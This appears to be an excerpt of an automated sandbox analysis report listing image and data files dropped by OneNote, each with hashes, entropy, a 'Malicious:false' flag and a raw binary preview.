                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.395580740068351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:gbsvNr/VpzEmdy3X7t94cRQy2+RcFLuMR8xe:ysvNr/VCmE3Xh94cRJ2+RcFLuMR6e
                                                                                                                                                                                                              MD5:9957631BE6F08FBAB095A156C5ED7E63
                                                                                                                                                                                                              SHA1:C18C7BF0C8BF5C5C425F1D89482CCF48423B1190
                                                                                                                                                                                                              SHA-256:D1B8D685A59254A7F4E048B6AAB3A12B4C669B2C0A889A2CC58D66C39FE130F7
                                                                                                                                                                                                              SHA-512:8F610D32D8FD7D8A9CE9B92F32457D37B0CFB684E81F7815704A6AEB6A86E4B386F05A873188B1659D303CC63AF2BC48811D6F2E4C038AC85916516F169B96AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZ.N}......N}6.].?....z.N}6.].?....z.N}..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............o.L(.\.%}%...3.....N...^...............`.9...G.$...c.:........f........................................I.qk..B.....LZ.............o.L(.\.%}%...3..........o.L(.\.%}%...3...........N}......N}......N}..........................................N}j.....N}T.]...N}......N}..B...N}H.....N}..B...N}..>.).N}..J...................;........4...4...4.."...............N}..N}..N}..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........N}......N}....#.N}............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1873
                                                                                                                                                                                                              Entropy (8bit):7.534961703340853
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                                                                                              MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                                                                                              SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                                                                                              SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                                                                                              SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.465434105355137
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:1sBsWlcmScAflo/cetUEe/X69TOSogsrdQVrum/BXpqXkDFMCIS:CsWMcoaceWEEX69T5sRQ5dmK6C
                                                                                                                                                                                                              MD5:6E6C2BBC84AEFE131BA06D47C448414F
                                                                                                                                                                                                              SHA1:6100A61F89F3492CC806FB67EC19569FB78D43BE
                                                                                                                                                                                                              SHA-256:3911AF0002853BD9E48D4A323CAD47DDDEF2804A1F6ADFBAE05BD4CFFE6C618F
                                                                                                                                                                                                              SHA-512:C1DEF61392B2D933B6F30C55BBB95828B1BBC92AACB051222FEC747647CEB6DF825313B2BAFEF794B5B9978FFA71D2B167F060A343AA51341A34C034BCA69814
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZd5......d5...... *ii.Av.d5...... *ii.Av.d5...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............DD......4..........N...^..................D.z.I..(..Qv.........Z........................................I.qk..B.....LZ.............DD......4...............DD......4...............d5......d5......d5..........................................d5.j....d5.T$c..d5......d5.G..d5...H..d5...>..d5......d5. .3...................;........4...4...4.."..............d5..d5..d5...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........d5......d5.....#d5.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5465
                                                                                                                                                                                                              Entropy (8bit):7.79401348966645
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                                                                                              MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                                                                                              SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                                                                                              SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                                                                                              SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3361
                                                                                                                                                                                                              Entropy (8bit):7.619405839796034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                                                                                              MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                                                                                              SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                                                                                              SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                                                                                              SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.352141138224157
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:asoclZdFxZEMcX4c9iJcRQyPIYA7H767Zt7U7HaR7S7:asoc7dFsJXN9iJcRJPvA7H767Zt7U7Hz
                                                                                                                                                                                                              MD5:25F4419591CA294FA1583DB8D7F1E7A0
                                                                                                                                                                                                              SHA1:947B73D1B2A34244CBF04093DB61F4268AD02252
                                                                                                                                                                                                              SHA-256:83BAAECAD24753533B808875AC415683CC777291551A51690C0FC4A4B5DAB66C
                                                                                                                                                                                                              SHA-512:1DAE103801EE08B6948347B5AD273243E6D28C5C7F8A50A2E96EADF65D99CBF40121A73246E727F8299ECDD8F20B07942A40D1593C995EDB3F6B32CF6B747139
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.n=......n=.V...#!.)gn.q.n=.V...#!.)gn.q.n=..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................*,...%<ImN%......N...^...............:...(.cO....lr..........f........................................I.qk..B.....LZ...............*,...%<ImN%.............*,...%<ImN%............n=......n=......n=..........................................n=j.....n=T.]...n=......n=..B...n=H.....n=..B...n=..>.).n=..J...................;........4...4...4.."...............n=..n=..n=..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........n=......n=....#.n=............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):140755
                                                                                                                                                                                                              Entropy (8bit):7.9013245181576695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                                                                                              MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                                                                                              SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                                                                                              SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                                                                                              SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.319736271510745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuTysN/Amf5tnsrzEuVL4XrNi9aVM6ohrdQqrzEBgyBXTl7mKhx:Ypsmmf5Js/EuV8XrM9u/gRQyCDvh
                                                                                                                                                                                                              MD5:9CBE7B3B385B1B07499AA0136673720A
                                                                                                                                                                                                              SHA1:1A0A36441EC437E9021BC87991C5E5949AE8DB85
                                                                                                                                                                                                              SHA-256:18FFF4BF523F6763D4959D51F7F0465266A2CA49FC79A7D5632C799558229EB1
                                                                                                                                                                                                              SHA-512:08322D0390BC7AB5BA024AFEAABECE46F9B3A117E6BF96D38744A3D6AD0ACBC392CB496089E8D3BA38C780521206CDB81F40357C44BC1CAAB747DC3F74A41893
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ..*.......*.Y... #....D..*.Y... #....D..*..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............3?WW....&L~Y......N...^................*.Az.B.#.#J..0........f........................................I.qk..B.....LZ..............3?WW....&L~Y............3?WW....&L~Y.............*.......*.......*...........................................*j......*T.]....*.......*..B....*H......*..B....*..>.)..*..J...................;........4...4...4.."................*...*...*..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........*.......*....#..*............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):129887
                                                                                                                                                                                                              Entropy (8bit):7.8877849553452695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                                                                                              MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                                                                                              SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                                                                                              SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                                                                                              SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.2366178649884905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Y5sSzCcl9FGXEr7dX49ydwRQyB4NCYjFY:Ks4lnr7dX49ydwRJB4
                                                                                                                                                                                                              MD5:25F70A7E5B6CF4725C7F88DD947534BD
                                                                                                                                                                                                              SHA1:75D2B3BCA7585E4B59314C67080D5544F3F27F5A
                                                                                                                                                                                                              SHA-256:06D4953FBD90FFDD3D45F7E99B229E1560BB95CFC1D2654A1496508597BD0E30
                                                                                                                                                                                                              SHA-512:7E5C55C7F71AAEED762F600A9E133DE0490F982DBFB1F4D4513A5D7242C15C6C28C3D84DBD714320C0118F6E06E1A7D23C4572A4C0A194025652F864EA39C807
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ..7.......7......Rc.W.N...7......Rc.W.N...7..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.......................)".mx4....N...^.............../aM.jT%F..E.n.U>........f........................................I.qk..B.....LZ......................)".mx4..................)".mx4...........7.......7.......7...........................................7j......7T.]....7.......7..B....7H......7..B....7..>.)..7..J...................;........4...4...4.."................7...7...7..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........7.......7....#..7............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84941
                                                                                                                                                                                                              Entropy (8bit):7.966881945560921
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                                                                                              MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                                                                                              SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                                                                                              SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                                                                                              SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.328998915543244
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuCs194UJ2G7tekEe+hlXQ9t82oFrdQqrjxbP2BXUpvb2G/yDgvB8CL:YVszsG7NEPvXQ9y2cRQyFqays
                                                                                                                                                                                                              MD5:0055D96B2B151CF22ED1113ACD3DE712
                                                                                                                                                                                                              SHA1:D7E07AEF238C8E33AF5AE352F682AD453BE2FC6B
                                                                                                                                                                                                              SHA-256:696137E88257542F6BC8CB69AFF9C8D8A0FF6EA89054E349669A0BF1B122810E
                                                                                                                                                                                                              SHA-512:DFE504D705F627B04D84A54BA5365D4A0B50DA5644DA136663B9A5B4CF756073A9BEFD3A0E3116135EB423BD32C9A45963044D26769E65D84865824992B52A1A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ...........p.9#.<P..e./....p.9#.<P..e./......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............IG(.x..6....A.....N...^......................G..fnb..!........f........................................I.qk..B.....LZ.............IG(.x..6....A..........IG(.x..6....A.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1569
                                                                                                                                                                                                              Entropy (8bit):7.583832946136897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                                                                                              MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                                                                                              SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                                                                                              SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                                                                                              SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.382193944365998
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5CsrjrMFCHa0JataQE+YlLGXBFP49SVKo9rdQqrvIQwBXib1eT94tDc7eYq1I:gs4FCHa2a1EplKXBFP49SVKkRQygQwl
                                                                                                                                                                                                              MD5:F5DE2D3406E0AE946BB4E111C686C54C
                                                                                                                                                                                                              SHA1:475FB18BA7698122FC7B56AA5AE9FCE7D8F4E3E6
                                                                                                                                                                                                              SHA-256:BE1670482333ECBFD9A5873FE95AF648E5426586F866F6FEABD02C328F4DB24C
                                                                                                                                                                                                              SHA-512:3B2D11FE3A873DC5E25436329FD97329734E9CEB806FE5D08917CC8D07896B1DE7F811E65984B9E051DF8D6BB3AAD9CA90CC28A353B2E5FCA9E97C55EC90CA40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ&.......&..?.-......K1e&..?.-......K1e&....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6z.Y....?K..sl.R....N...^.................u.nHK......q........f........................................I.qk..B.....LZ............6z.Y....?K..sl.R........6z.Y....?K..sl.R.........&.......&.......&...........................................&..j....&..T.]..&.......&....B..&..H....&....B..&....>.)&....J...................;........4...4...4.."..............&...&...&....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........&.......&......#&..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40035
                                                                                                                                                                                                              Entropy (8bit):7.360144465307449
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                                                                                              MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                                                                                              SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                                                                                              SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                                                                                              SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.631487726753683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:hszNy2Z+1rpwH5E3/DX6ZC9eVd0RQyAPBRluBrEk:hsRy2Erpl3/DXB9ef0RJAPBRluBgk
                                                                                                                                                                                                              MD5:76586F74C3E8BD7227406AD800B52E25
                                                                                                                                                                                                              SHA1:763353374E0B11A74362A98BE47DBF316212A2DE
                                                                                                                                                                                                              SHA-256:32007D1387C9A5FBBF6AFD7FED41230E8BAC0105153638E470CD0FCFB1C01EEA
